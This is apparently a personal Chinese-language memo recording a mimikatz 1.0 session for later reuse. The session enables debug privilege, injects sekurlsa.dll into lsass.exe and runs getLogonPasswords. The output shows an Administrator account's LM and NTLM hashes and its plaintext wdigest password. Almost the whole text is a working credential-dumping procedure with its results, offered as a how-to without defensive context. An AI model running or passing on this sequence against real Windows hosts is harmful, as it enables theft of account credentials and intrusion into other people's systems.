命令一直忘,记录下来吧。
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 1164
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;218411
Package d'authentification : NTLM
Utilisateur principal : ANONYMOUS LOGON
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
Authentification Id : 0;87064
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : 思密达
msv1_0 : lm{ 93a4f02839e824417584248b8d2c9f9e }, ntlm{ d9640e9219
712c8788ce086c6db63592 }
wdigest : 123456